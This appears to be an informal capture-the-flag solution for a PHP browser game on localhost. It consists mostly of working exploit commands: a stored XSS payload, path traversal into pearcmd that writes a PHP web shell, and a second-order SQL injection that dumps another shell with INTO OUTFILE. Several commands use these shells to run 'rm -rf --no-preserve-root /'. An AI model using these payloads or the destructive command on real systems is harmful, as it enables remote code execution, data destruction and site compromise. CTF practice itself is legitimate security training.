no writeup for you
maybe you can guess the flag
...
...
...
just kidding
by the way if brunoipjg/apache-php-5.2 got bugs then gg lol, but no one cares

although you can set the extra ability points to 1e+9 during registration to get 65536 ability points... don't even bother to play the game, no one plays


How to XSS if the input blocks ' " < > \ ? I don't know.
Flag 1:

curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" http://localhost:8765/wog_act.php -d "f=pk&act=setup&pk_money=1&pk_setup=1,p_url=0x272b6576616c286e616d65292b27"

then craft a page with payload as window.name and login with your own account.. you know ga la.
---

I think this one may be more obvious... lol, so I hide the flag in somewhere instead of /proof.sh
Flag 2:

curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" http://localhost:8765/wog_act.php?+install -d "f=mission&act=end&temp_id=/../../../../lib/php/pearcmd"

Yeah nothing to install. Craft your own payload la. 

curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" 'http://localhost:8765/wog_act.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=show_source("/usr/local/apache2/htdocs/forum_support/config/config.php")?>+/tmp/hellmen.php' -d "f=mission&act=end&temp_id=/../../../../lib/php/pearcmd"

curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" 'http://localhost:8765/wog_act.php' -d "f=mission&act=end&temp_id=/../../../../../../tmp/hellmen"


why show_source... you are using curl man :-(


curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" 'http://localhost:8765/wog_act.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=system("$_GET[0]");?>+/tmp/hellmen.php' -d "f=mission&act=end&temp_id=/../../../../lib/php/pearcmd"

curl -H "Cookie: PHPSESSID=57efe396627ab3b5e651ce64061871f3; wog_cookie=2; wog_cookie_name=asdf; wog_bbs_id=1; wog_cookie_debug=22b53148583068af1f18ac2c126443f0" 'http://localhost:8765/wog_act.php?0=rm+-rf+--no-preserve-root+/' -d "f=mission&act=end&temp_id=/../../../../../../tmp/hellmen"

seems still alive


=======

Increased difficulty:
instead of using pearcmd as always, this time requires second-order sql injection dumpfile

how? special characters are blocked in $_POST; $_GET got addslashes due to magic quote

function syn_detail() in wog_act_syn

fetch('wog_act.php',{'method':'post','headers':{'Content-type':'application/x-www-form-urlencoded'},'body':'f=syn&act=detail&syn_id=0 AND 0 UNION SELECT 0x302920554E494F4E2053454C45435420273C3F3D60245F4745545B305D603B3F3E2720494E544F204F555446494C4520272F746D702F70776E2E70687027202D2D20,2,3,4,5,6 -- '}).then(_=>_.text()).then(_=>console.log(_));


then what... include the payload lor

fetch('wog_act.php?0=rm+-rf+--no-preserve-root+/',{'method':'post','headers':{'Content-type':'application/x-www-form-urlencoded'},'body':'f=mission&act=end&temp_id=/../../../../../../tmp/pwn'}).then(_=>_.text()).then(_=>console.log(_));

=======